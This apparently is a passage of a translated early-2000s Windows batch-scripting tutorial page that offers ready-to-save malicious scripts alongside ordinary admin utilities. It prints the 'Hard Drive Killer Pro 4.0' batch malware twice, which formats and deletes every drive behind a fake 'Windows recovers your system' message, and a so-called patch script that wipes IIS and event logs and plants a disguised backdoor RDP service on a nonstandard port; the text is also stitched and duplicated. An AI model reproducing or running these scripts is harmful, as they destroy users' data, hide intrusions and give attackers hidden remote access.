echo if errorlevel 1 goto enddc >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.

rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if its errorlevel 1, then the specified drive is a hard or floppy drive.

rem if its not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul

del drivechk.bat >nul

if %drive.==. set drive=c

:form_del

call attrib -r -h c:\autoexec.bat >nul

echo @echo off >c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat

echo cd\ >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat

echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat

echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat

echo echo 2. Love is important, if you have it, truly, dont let go of it like I did! >>c:\autoexec.bat

echo echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad your HD is dead. >>c:\autoexec.bat

echo echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat

echo echo. >>c:\autoexec.bat

echo echo Regards, >>c:\autoexec.bat

echo echo. >>c:\autoexec.bat

echo echo Munga Bunga >>c:\autoexec.bat

call attrib +r +h c:\autoexec.bat

:makedir

if exist c:\temp.bat attrib -r -h c:\temp.bat >nul

echo @echo off >c:\temp.bat

echo %%1:\ >>c:\temp.bat

echo cd\ >>c:\temp.bat

echo :startmd >>c:\temp.bat

echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat

echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat

echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat

call attrib +r +h c:\temp.bat >nul

cls

echo Initializing Variables . . .

rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.

for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul

call attrib +r +h c:\temp.bat >nul

call attrib +r +h c:\autoexec.bat >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:\*. >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

echo Starting Application . . .

for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls

echo Thank you for using a Munga Bunga product.

echo.

echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.

echo.

echo Here is a joke for you . . .

echo.

echo Q). Whats the worst thing about being an egg?

echo A). You only get laid once.

echo.

echo HAHAHAHA, get it? Dont you just love that one?

echo.

echo Regards,

echo.

echo Munga Bunga

:end

rem Hard Drive Killer Pro Version 4.0, enjoy!!!!

rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here).
------------------------ cut here then save as .bat or .cmd file ---------------------------

2. A batch file to harden the system across the board (patching the zombie)

------------------------ cut here then save as .bat or .cmd file ---------------------------

@echo Windows Registry Editor Version 5.00 >patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll

@echo "AutoShareServer"=dword:00000000 >>patch.dll

@echo "AutoShareWks"=dword:00000000 >>patch.dll

@REM [Disable shares]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [Disable anonymous logon]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [Disable file and printer sharing access]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [Disable shutdown before logon]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [Do not display the previous logon user name]

@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file ---------------------------

The following commands clear all of the zombie's logs, disable some dangerous services, and modify the zombie's terminal service to leave a way back in.

@regedit /s patch.dll

@net stop w3svc

@net stop event log

@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q

@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q

@del c:\winnt\system32\config\*.event /f /q

@del c:\winnt\system32dtclog\*.* /f /q

@del c:\winnt\*.txt /f /q

@del c:\winnt\*.log /f /q

@net start w3svc

@net start event log

@rem [Delete logs]

@net stop lanmanserver /y

@net stop Schedule /y

@net stop RemoteRegistry /y

@del patch.dll

@echo The server has been patched,Have fun.

@del patch.bat

@REM [Disable some dangerous services.]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll

@echo "PortNumber"=dword:00002010 >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll

@echo "PortNumber"=dword:00002012 >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll

@echo "Start"=dword:00000002 >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll

@echo "Start"=dword:00000002 >>patch.dll

@echo "ErrorControl"=dword:00000001 >>patch.dll

@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll

@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll

@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll

@echo "ObjectName"="LocalSystem" >>patch.dll

@echo "Type"=dword:00000010 >>patch.dll

@echo "Description"="Keep record of the program and windows message。" >>patch.dll

@echo "DisplayName"="Microsoft EventLog" >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll

@echo "Start"=dword:00000004 >>patch.dll

@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe

@REM [Change the 3389 connection: port 8210 (hex 00002012), name Microsoft EventLog, leaving a way back in]
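To review what a .reg file like the one the echo lines above write into patch.dll would change, before it is applied or while reconstructing an incident, here is an added Python triage parser (not from the original page). It assumes only the .reg text format; SAMPLE_REG is a constructed sample.

```python
# Added example, not part of the original page: a triage parser for the
# Windows .reg text that the echo lines above write into patch.dll.  It joins
# the backslash-continued hex(2) lines, decodes REG_EXPAND_SZ payloads
# (UTF-16LE) and lists the settings a responder would check first: the
# RDP-Tcp listener port and the Start/ImagePath values of services.
# SAMPLE_REG is constructed for this example.
import re
from typing import Dict, List, Tuple

SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00002010
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="Microsoft EventLog"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]
"Start"=dword:00000004
'''

Value = Tuple[str, object]          # (kind, decoded value)
RDP_DEFAULT_PORT = 3389


def _join_continuations(text: str) -> List[str]:
    """Join lines that end in a backslash, as regedit does for hex data."""
    lines: List[str] = []
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        lines.append(buf + line)
        buf = ""
    if buf:
        lines.append(buf)
    return lines


def decode_value(rhs: str) -> Value:
    """Decode the right-hand side of a "Name"=... line."""
    if rhs.startswith("dword:"):
        return ("dword", int(rhs[len("dword:"):], 16))
    m = re.match(r"hex(?:\((\d+)\))?:(.*)", rhs)
    if m:
        raw = bytes(int(b, 16) for b in m.group(2).split(",") if b)
        if m.group(1) == "2":       # REG_EXPAND_SZ, NUL-terminated UTF-16LE
            return ("expand_sz", raw.decode("utf-16-le").rstrip("\x00"))
        return ("hex", raw)
    if len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
        return ("sz", rhs[1:-1])
    return ("raw", rhs)


def parse_reg(text: str) -> Dict[str, Dict[str, Value]]:
    """Map each [key] section to its "name"=value entries."""
    keys: Dict[str, Dict[str, Value]] = {}
    current = None
    for line in _join_continuations(text):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            name, _, rhs = line[1:].partition('"=')
            keys[current][name] = decode_value(rhs)
    return keys


def triage(keys: Dict[str, Dict[str, Value]]) -> List[str]:
    """Human-readable findings for the changes worth a second look."""
    findings: List[str] = []
    for key, values in keys.items():
        k = key.lower()
        if k.endswith("\\winstations\\rdp-tcp") and "PortNumber" in values:
            port = values["PortNumber"][1]
            if port != RDP_DEFAULT_PORT:
                findings.append(f"RDP listener moved to port {port}")
        if "\\services\\" in k:
            svc = key.rsplit("\\", 1)[1]
            if "Start" in values:
                findings.append(f"service {svc} Start={values['Start'][1]}")
            if "ImagePath" in values:
                findings.append(f"service {svc} ImagePath={values['ImagePath'][1]}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_reg(SAMPLE_REG)):
        print(finding)
```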

3. Hard Drive Killer Pro Version 4.0 (getting batch processing to this level is really not easy.)

------------------------ cut here then save as .bat or .cmd file ---------------------------

@echo off

rem This program is dedicated to a very special person that does not want to be named.

:start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

call attrib -r -h c:\autoexec.bat >nul

echo @echo off >c:\autoexec.bat

echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat

call attrib +r +h c:\autoexec.bat >nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=

set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.

rem drivechk.bat is the file name under the root directory.

rem As far as the drive detection and drive variable settings, dont worry about how it

rem works, its damn too complicated for the average or even the expert batch programmer.

rem Except for Tom Lavedas.

echo @echo off >drivechk.bat

echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then its true.
rem Opposite of binary rules. If 0, it will elapse to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.

rem if errorlevel is 0, then it will elapse to the next command.

echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if its errorlevel 1, then the specified drive is a hard or floppy drive.

rem if its not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.
:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul

del drivechk.bat >nul

if %drive.==. set drive=c

:form_del

call attrib -r -h c:\autoexec.bat >nul

echo @echo off >c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat

echo cd\ >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat

echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat

echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat

echo echo 2. Love is important, if you have it, truly, dont let go of it like I did! >>c:\autoexec.bat

echo echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad your HD is dead. >>c:\autoexec.bat

echo echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat

echo echo. >>c:\autoexec.bat

echo echo Regards, >>c:\autoexec.bat

echo echo. >>c:\autoexec.bat

echo echo Munga Bunga >>c:\autoexec.bat

call attrib +r +h c:\autoexec.bat

:makedir

if exist c:\temp.bat attrib -r -h c:\temp.bat >nul

echo @echo off >c:\temp.bat

echo %%1:\ >>c:\temp.bat

echo cd\ >>c:\temp.bat

echo :startmd >>c:\temp.bat

echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat

echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat

echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat

call attrib +r +h c:\temp.bat >nul

cls

echo Initializing Variables . . .

rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.

for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul

call attrib +r +h c:\temp.bat >nul

call attrib +r +h c:\autoexec.bat >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:\*. >nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

echo Starting Application . . .

for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls

echo Thank you for using a Munga Bunga product.

echo.

echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.

echo.

echo Here is a joke for you . . .

echo.

echo Q). Whats the worst thing about being an egg?

echo A). You only get laid once.

echo.

echo HAHAHAHA, get it? Dont you just love that one?

echo.

echo Regards,

echo.

echo Munga Bunga

:end

rem Hard Drive Killer Pro Version 4.0, enjoy!!!!

rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here).

No.7

7. Acknowledgements & some rambling

This article is dedicated to all friends working for freedom and sharing on the network. Thanks to everyone who shares their work; let us work together for our ideals!!

Part of the content comes from Ex4rch http://www.sometips.com (a very good ... ^_^). Special thanks again!
How to monitor your server with a batch file
Author: joyadam@myrealbox.com
  Date: 2002-4-13 15:05:33

 


Yesterday I saw a command-line port scanning tool on Microsoft's website and downloaded it to have a look (you can also download it from http://www.sometips.com/soft/portqry.exe). In terms of usability I felt this thing was far worse than other products of its kind, but on closer inspection it turned out to have a return-value feature, which means it can be used inside a batch file. So I wrote a small script; I hope it helps everyone.

C:\scripts>type monitor.cmd
@echo off
setlocal
if {%1}=={} goto noparms
if {%2}=={} goto noparms

REM Please copy portqry.exe to the same folder with monitor.cmd.
portqry -n %1 -e %2 -q

IF %ERRORLEVEL% EQU 2 goto filtered
IF %ERRORLEVEL% EQU 1 goto down
IF %ERRORLEVEL% EQU 0 goto up

:noparms
echo Usage: monitor.cmd ServerIP PortNumber
goto end

:up
echo The %2 port is listening on %1...
goto end

:down
echo The %2 port is not listening on %1...
goto end

:filtered
echo The %2 port on %1 is listening or filtered (portqry returned 2)...
goto end

:end

Result of running the script:
C:\scripts>monitor.cmd
Usage: monitor.cmd ServerIP PortNumber

C:\scripts>monitor.cmd bbs.nsfocus.com 80
The 80 port is listening on bbs.nsfocus.com...

C:\scripts>monitor.cmd bbs.nsfocus.com 79
The 79 port is not listening on bbs.nsfocus.com...

Note: you can modify this script to suit your own needs. Hope it helps...

PortQry usage, attached:
PortQry Usage:
PortQry.exe -n server [-p protocol] [-e || -r || -o endpoint(s)]
        [-l logfile] [-s] [-q]

Where:
        -n [server] IP address or name of server to query
        -p [protocol] TCP or UDP or BOTH (default is TCP)
        -e [endpoint] single port to query (valid range: 1-65535)
        -r [end point range] range of ports to query (start:end)
        -o [end point order] range of ports to query in an order (x,y,z)
        -l [logfile] name of log file to create
        -s 'slow link delay' waits longer for UDP replies from remote systems
        -q 'quiet' operation runs with no output
           returns 0 if port is listening
           returns 1 if port is not listening
           returns 2 if port is listening or filtered

Notes:
        This version runs on Windows 2000 and Windows XP
        Defaults: TCP, port 80, no log file, slow link delay off
        Hit Ctrl-c to terminate prematurely

A reboot .bat file, which should work on all Windows systems
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:39


@echo off
echo welcome to http://www.sometips.com/
setlocal
cd/d %temp%
echo [version] > reboot.inf
set inf=InstallHinfSection DefaultInstall
echo signature=$chicago$ >> reboot.inf
echo [defaultinstall] >> reboot.inf
rundll32 setupapi,%inf% 1 %temp%\reboot.inf
del reboot.inf

A script to monitor the event log
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:36

 


'=====================================================
'FileName: eventmon.vbs
'Usage:  cscript eventmon.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date:  2001-05-13
'Comment: This Script will monitor your event log, I have tested on Win2K Server.
'=====================================================

Set Events = _
GetObject("winmgmts:{(Security)}\\.\root\cimV2").ExecNotificationQuery ("select * from __InstanceCreationEvent WHERE TargetInstance ISA " _
  & "'Win32_NTLogEvent'")

Do
Set NTEvent = Events.nextevent
WScript.Echo NTEvent.TargetInstance.Message
Loop

A VBS to view host variables, including the system, process and user environment variables
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:35

 


'=====================================================
'FileName: envar.vbs
'Usage:  cscript envar.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date:  2001-04-28
'Comment: This Script will query the environments on your machine.
'=====================================================


Set shellobj = CreateObject("WScript.Shell")

WScript.Echo "System environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("SYSTEM")
WScript.Echo envvar
Next

WScript.Echo vbCrLf & "Process environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("PROCESS")
WScript.Echo envvar
Next

WScript.Echo vbCrLf & "USER environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("USER")
WScript.Echo envvar
Next

WScript.Echo vbCrLf & "VOLATILE environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("VOLATILE")
WScript.Echo envvar
Next

Su2System.vbs
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:31

 


In daily work we need to switch to the SYSTEM user to do some things, for example to look at the SAM values in the registry...
The method I usually use is to switch via the scheduler, while Dingding, that rascal, likes to switch by adding a service. For convenience I wrote a VBS to carry out this process! Of course, there is no privilege escalation concept here, because it must be run as an administrator!

'=====================================================
'FileName: su2system.vbs
'Usage:  cscript su2system.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date:  2001-04-05
'Comment: This script will let you change your UID to
'  NT AUTHORITY\SYSTEM, you must run it by Administrator.
'=====================================================
On Error Resume Next

Set objNet = WScript.CreateObject( "WScript.Network" )
Set ServiceObj = GetObject("WinNT://" & objNet.ComputerName & "/schedule")

if ServiceObj.Status=1 then
ServiceObj.start
end if

' Schedule for the next minute. The original used an undefined aSecond and
' could produce minute 60, so take Hour/Minute from Now + 1 minute instead.
aTime = DateAdd("n", 1, Now)
aHour = Hour(aTime)
aMinute = Right("0" & Minute(aTime), 2)

set wshshell = createobject ("wscript.shell")
wshshell.run ("at " & aHour & ":" & aMinute & " /interactive cmd.exe")

Wscript.echo "Waiting for the cmd window for NT AUTHORITY\SYSTEM at " & aHour & ":" & aMinute & "..."

A script to query the host's hot-fixes -- Patch.vbs
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:30

 


'=====================================================
'FileName: patch.vbs
'Usage:  cscript patch.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date:  2001-03-25
'  Update at 2001-03-28
'Comment: This Script will query the patch which has installed
'  on your machine.
'=====================================================

ComputerName = "."   ' local machine; the original never set this variable
winmgmt1 = "winmgmts:{impersonationLevel=impersonate}!//"& ComputerName &""
Set SPSet = GetObject( winmgmt1 ).InstancesOf ("Win32_OperatingSystem")

WScript.Echo "====================================================="
WScript.Echo "Computer Operating System Properties for " & ""& ComputerName &""
WScript.Echo "====================================================="

For each SP in SPSet
  WScript.Echo "Operating System: " & SP.Name
  WScript.Echo "Install Date: " & left (cstr(SP.installdate),4) & "-" & mid (cstr(SP.installdate),5,2) & "-" & mid (cstr(SP.installdate),7,2)
  WScript.Echo "Build Number: " & SP.BuildNumber
  WScript.Echo "Build Type: " & SP.CSDVersion
next

'Sub GetHotfixInfos()  'Get information on the installed hot-fixes
winmgmt = "winmgmts:{impersonationLevel=impersonate}!//"& ComputerName &""
Set QFESet = GetObject( winmgmt).InstancesOf ("Win32_QuickFixEngineering")
WScript.Echo "====================================================="
WScript.Echo "The following HotFixes have been Installed:"
For each QFE in QFESet
  WScript.Echo QFE.HotFixID
  WScript.Echo QFE.FixComments
  Wscript.Echo "Please visit http://support.microsoft.com/support/kb/articles/" & left(QFE.HotFixID,4) & "/" & mid(QFE.HotFixID,5,1) & "/" & right(QFE.HotFixID,2) & ".ASP"
  Wscript.Echo QFE.ServicePackInEffect
  Wscript.Echo "-----------------------------------------------------"
next
'End Sub


Batch-modify the attributes of the users in an OU with VBS - modify.vbs
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:29

 


Dim oContainer
Set oContainer=GetObject("LDAP://OU=工程部,OU=公司,DC=staff,DC=nsfocus,DC=com")
ModifyUsers oContainer
'cleanup
Set oContainer = Nothing
WScript.Echo "Finished"
Sub ModifyUsers(oObject)
Dim oUser
oObject.Filter = Array("user")
For Each oUser in oObject
oUser.Put "st","北京"
oUser.Put "streetAddress","北三環東路8號"
oUser.Put "postalCode","100028"
oUser.Put "l","北京"
oUser.SetInfo
Next
End Sub

Export the users of an OU in AD with VBS - output.vbs
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:24

 


'=====================================================

'output.vbs

'Author: Adam

'Date: 2001-03-07

'Comment: you must change the value of oContainer before use

'=====================================================

Dim OutPutFile
Dim FileSystem
'Initialize global variables
Set FileSystem = WScript.CreateObject("Scripting.FileSystemObject")
Set OutPutFile = FileSystem.CreateTextFile("users.txt", True)
Set oContainer=GetObject("LDAP://OU=公司,DC=staff,DC=nsfocus,DC=com")
'Enumerate Container
EnumerateUsers oContainer
'Clean up
OutPutFile.Close
Set FileSystem = Nothing
Set oContainer = Nothing
WScript.Echo "Finished"
WScript.Quit(0)
Sub EnumerateUsers(oCont)
Dim oUser
For Each oUser In oCont
Select Case LCase(oUser.Class)
Case "user"
  If Not IsEmpty(oUser.distinguishedName) Then
   OutPutFile.WriteLine "dn: " & oUser.distinguishedName
  End If
  If Not IsEmpty(oUser.name) Then
   OutPutFile.WriteLine "name: " & oUser.Get ("name")
  End If
'need to do this because oUser.name would get back the Relative Distinguished name (i.e. CN=Jo Brown)
  If Not IsEmpty(oUser.st) Then
   OutPutFile.WriteLine "st: " & oUser.st
  End If
  If Not IsEmpty(oUser.streetAddress) Then
   OutPutFile.WriteLine "streetAddress: " &    oUser.streetAddress
  End If
Case "organizationalunit" , "container"
  EnumerateUsers oUser
End Select
OutPutFile.WriteLine
Next
End Sub

A "Which" command for Windows
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:21

 


On Linux there is a command called which, which searches the Path for the directory containing a command and displays it.


On Linux:

[adam@isbase adam]$ which ls

/bin/ls

[adam@isbase adam]$ which rm

/bin/rm


The NT Resource Kit has a where.exe which does the same thing, but a Resource Kit costs 300 US dollars, so here we can write a batch file to implement this function.


Use Notepad to create a which.bat and put it in the Winnt directory or another directory in the Path variable; the contents of the batch file are as follows:


@echo off


Rem Check the command-line parameters

if {%1}=={} goto :Usage

for %%i in ({ {/ {-) do if {%1}==%%i?} goto :Usage %%i

echo.


:Rem Check whether the file exists in the current directory

for %%i in (%1) do if exist %%~nxi (

    echo %%~Fi

    goto :EOF

)


:Rem Look for the file in the Path

for %%i in (%1) do (

    if exist %%~$PATH:i (

        echo %%~$PATH:i

    ) else (

        echo Error: %1 不在路徑裏!!!

        goto :Usage

    )

)

goto :EOF

 

:Usage

echo.

echo WHICH "filename"

echo.

echo       輸入文件明,返回該文件的全路徑!

echo.

 

Let's test our program:

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版權全部 1985-1998 Microsoft Corp.


C:\>which


WHICH "filename"


      輸入文件明,返回該文件的全路徑!

 

C:\>which cmd.exe


C:\WINNT\system32\cmd.exe


C:\>


OK, test passed!

Sendmail.vbs
Author:
  Date: 2002-1-13 18:34:11

 


   '--------------------------------------------------

